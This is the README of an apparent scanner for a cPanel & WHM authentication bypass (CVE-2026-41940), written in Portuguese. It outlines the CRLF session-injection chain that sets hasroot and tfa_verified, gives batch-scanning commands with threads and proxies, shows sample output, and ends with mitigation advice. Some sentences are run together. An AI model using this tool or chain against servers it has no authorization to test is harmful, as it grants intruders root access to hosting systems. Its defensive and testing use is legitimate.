
Scanner para bypass de autenticação do cPanel & WHM (CVE-2026-41940) que detecta versões vulneráveis via injeção CRLF e manipulação de sessão, com suporte a multi-threading e proxy.
CVE-2026-41940 Scanner de Bypass de Autenticação cPanel & WHM
Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais. O utilizador deve cumprir as leis e regulamentos locais, sendo estritamente proibido efetuar scans em sistemas não autorizados. O autor não se responsabiliza por qualquer uso indevido.
| Item | Detalhes |
|---|
| ID CVE | CVE-2026-41940 |
| Nome da Vulnerabilidade | Injeção CRLF no Ficheiro de Sessão cPanel & WHM |
| Nível de Gravidade | 🔴 CRÍTICO (CVSS 9.8) |
| Versões Afetadas | cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5 |
| Tipo de Vulnerabilidade | Bypass de Autenticação → Obtenção de Privilégios Root |
| Dificuldade de Exploração | Baixa |
O cPanel & WHM apresenta uma falha lógica no processamento de ficheiros de sessão:
saveSession() chama filter_sessiondata() após escrever o ficheiro de sessãoAuthorization: Basic contendo injeção CRLFhasroot=1, tfa_verified=1✅ Deteção precisa - Reproduz rigorosamente a cadeia de exploração original
✅ Sem dependências - Utiliza apenas a biblioteca padrão do Python
✅ Multithreading - Suporta scans em lote
✅ Suporte a proxy - Compatível com Burp Suite/Owasp ZAP
✅ Análise inteligente - Preenche automaticamente protocolo e porta
✅ Saída destacada - Resultados de vulnerabilidade em vermelho bem visível
[1] POST /login/?login_only=1 → Obter sessão pré-autenticada
[2] GET / + Injeção CRLF → Corromper o ficheiro de sessão
[3] GET /scripts2/listaccts → Acionar a limpeza da cache
[4] GET /cpsess/token/json-api/version → Verificar privilégios Root
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py
# Preenchimento automático de https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087
# Especificar URL completo
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087
# Ler alvos de um ficheiro
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20
# Formato do targets.txt:
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087
# Utilizar proxy HTTP
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080
# Scan em lote através de proxy
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5
| Parâmetro | Descrição | Exemplo |
|---|---|---|
-u, --url | Alvo único | -u 1.2.3.4:2087 |
-f, --file | Ficheiro com lista de alvos | -f targets.txt |
-t, --threads | Número de threads (padrão: 10) | -t 20 |
--timeout | Tempo limite (padrão: 10 segundos) | --timeout 15 |
--proxy | Proxy HTTP/HTTPS | --proxy http://127.0.0.1:8080 |
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087

13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087
O script confirma a vulnerabilidade através da seguinte lógica:
whostmgrsession/cpsess{digit}/json-api/version retorna 200 e contém o campo "version"⚠️ Nota: Alguns alvos podem retornar 500/503 e exibir "License", o que ainda indica que o bypass de autenticação foi bem-sucedido, apenas falta a licença comercial.
Atualize imediatamente para as seguintes versões seguras:
Medidas de Mitigação Temporárias:
/var/cpanel/sessions/Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e investigação defensiva. Qualquer scan não autorizado constitui uma violação da lei, sendo da inteira responsabilidade do utilizador.
Dá ⭐ a este projeto para obteres mais atualizações de ferramentas de segurança!